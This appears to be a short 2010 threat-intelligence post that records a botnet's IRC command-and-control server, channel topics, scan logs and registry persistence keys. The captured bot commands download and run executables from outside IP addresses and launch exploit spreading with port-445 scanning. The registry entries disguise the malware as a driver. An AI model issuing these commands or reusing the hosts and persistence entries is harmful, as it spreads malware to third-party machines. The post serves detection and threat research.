Friday, June 25, 2010

ms4alllll.tecBoom.com

ms4alllll.tecBoom.com:47221

Botnet C&C (IRC)
o49949 changes topic to '.asc -S|.asc exp_all 25 2 0 -a -r|.asc exp_all 25 2 0 -b -r|.asc exp_all 25 2 0 -c'
* o49949 changes topic to 'finito'

Channels
/jojo #dpi
/jojo #a

.asc -S|.http http://208.53.183.164/httpd.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c

Channel #-: ".asc -S|.http http://208.53.183.162/ma32ol.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c"

Private Message to Channel #i: "HTTP SET http://208.53.183.162/ma32ol.exe"
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Trying to get external IP."

The following registry values are set so that cndrive32.exe runs every time Windows starts:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"
